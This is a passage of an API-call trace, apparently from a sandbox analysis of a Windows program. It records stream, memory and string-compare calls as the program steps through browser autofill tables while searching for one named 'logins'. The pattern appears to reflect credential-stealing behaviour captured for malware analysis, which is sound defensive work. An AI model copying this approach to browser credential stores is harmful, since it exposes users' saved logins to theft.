(This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x1d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.111] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1a20 [0590.111] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x2e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.111] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.111] LocalAlloc (uFlags=0x40, uBytes=0x205) returned 0x2f09968 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x2f, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:SetSize (This=0x5ec250, libNewSize=0x2f09968) returned 0x0 [0590.111] LocalAlloc (uFlags=0x40, uBytes=0x20d) returned 0x2f09b78 [0590.111] LocalFree (hMem=0x2f09968) returned 0x0 [0590.111] LocalFree (hMem=0x56fe98) returned 0x0 [0590.111] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.111] lstrcmpiA (lpString1="autofill_profiles", lpString2="logins") returned -1 [0590.111] LocalFree (hMem=0x58d548) returned 0x0 [0590.111] LocalFree (hMem=0x5d1978) returned 0x0 [0590.111] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.111] LocalFree (hMem=0x58d970) returned 0x0 [0590.111] LocalFree (hMem=0x2f09b78) returned 0x0 [0590.111] LocalFree (hMem=0x570078) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x6b99, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x6b99, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x6b9a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.111] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.111] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x57ea78, libOffset=0x6b9b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.111] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.111] LocalFree (hMem=0x2f09968) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.111] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.112] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.112] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.112] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.112] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.112] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x59a9c8 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x5ec250, libNewSize=0x59a9c8) returned 0x0 [0590.112] LocalAlloc (uFlags=0x40, uBytes=0xac) returned 0x2ed5118 [0590.112] LocalFree (hMem=0x59a9c8) returned 0x0 [0590.112] LocalAlloc (uFlags=0x40, uBytes=0x91) returned 0x56ffd8 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x2f, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.112] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1a20 [0590.112] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x5ec250, libOffset=0x40, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.112] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.112] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.112] LocalFree (hMem=0x570078) returned 0x0 [0590.112] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.112] lstrcmpiA (lpString1="autofill_profiles", lpString2="logins") returned -1 [0590.112] LocalFree (hMem=0x58d970) returned 0x0 [0590.112] LocalFree (hMem=0x2ed5118) returned 0x0 [0590.112] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.112] LocalFree (hMem=0x58d548) returned 0x0 [0590.112] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.112] LocalFree (hMem=0x56fe98) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x6adb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x6adb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x6adc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.112] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.112] IStream:LockRegion (This=0x57ea78, libOffset=0x6add, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.113] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.113] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.113] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x57ea78, libOffset=0x6ade, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.113] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.113] LocalFree (hMem=0x2f09968) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.113] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.113] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.113] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.113] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.113] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.113] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x56ffd8 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.113] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0x5d1a20 [0590.113] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.113] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x56ffd8 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.113] IStream:LockRegion (This=0x5ec250, libOffset=0x22, cb=0x0, dwLockType=0x0) returned 0x0 [0590.113] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.113] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0x5d1978 [0590.113] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x38, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.114] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.114] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x39, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:SetSize (This=0x5ec250, libNewSize=0x5d0e30) returned 0x0 [0590.114] LocalAlloc (uFlags=0x40, uBytes=0x10a) returned 0x5d1178 [0590.114] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.114] LocalFree (hMem=0x56fe98) returned 0x0 [0590.114] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.114] lstrcmpiA (lpString1="autofill_profile_names", lpString2="logins") returned -1 [0590.114] LocalFree (hMem=0x58d548) returned 0x0 [0590.114] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.114] LocalFree (hMem=0x5d1978) returned 0x0 [0590.114] LocalFree (hMem=0x58d970) returned 0x0 [0590.114] LocalFree (hMem=0x5d1178) returned 0x0 [0590.114] LocalFree (hMem=0x570078) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x6a5b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x6a5b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x6a5c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.114] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.114] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x57ea78, libOffset=0x6a5d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.114] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.114] LocalFree (hMem=0x2f09968) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.114] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.114] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.114] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.115] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1978 [0590.115] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x23, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1a20 [0590.115] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x3a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0xc3) returned 0x5d73b0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x5ec250, libOffset=0x3b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:SetSize (This=0x5ec250, libNewSize=0x5d73b0) returned 0x0 [0590.115] LocalAlloc (uFlags=0x40, uBytes=0xcb) returned 0x5977a0 [0590.115] LocalFree (hMem=0x5d73b0) returned 0x0 [0590.115] LocalFree (hMem=0x570078) returned 0x0 [0590.115] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.115] lstrcmpiA (lpString1="autofill_profile_emails", lpString2="logins") returned -1 [0590.115] LocalFree (hMem=0x58d970) returned 0x0 [0590.115] LocalFree (hMem=0x5d1978) returned 0x0 [0590.115] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.115] LocalFree (hMem=0x58d548) returned 0x0 [0590.115] LocalFree (hMem=0x5977a0) returned 0x0 [0590.115] LocalFree (hMem=0x56fe98) returned 0x0 [0590.115] IStream:LockRegion (This=0x57ea78, libOffset=0x69da, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x57ea78, libOffset=0x69da, cb=0x0, dwLockType=0x0) returned 0x0 [0590.115] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.115] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.115] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.115] IStream:LockRegion (This=0x57ea78, libOffset=0x69db, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.116] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.116] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, 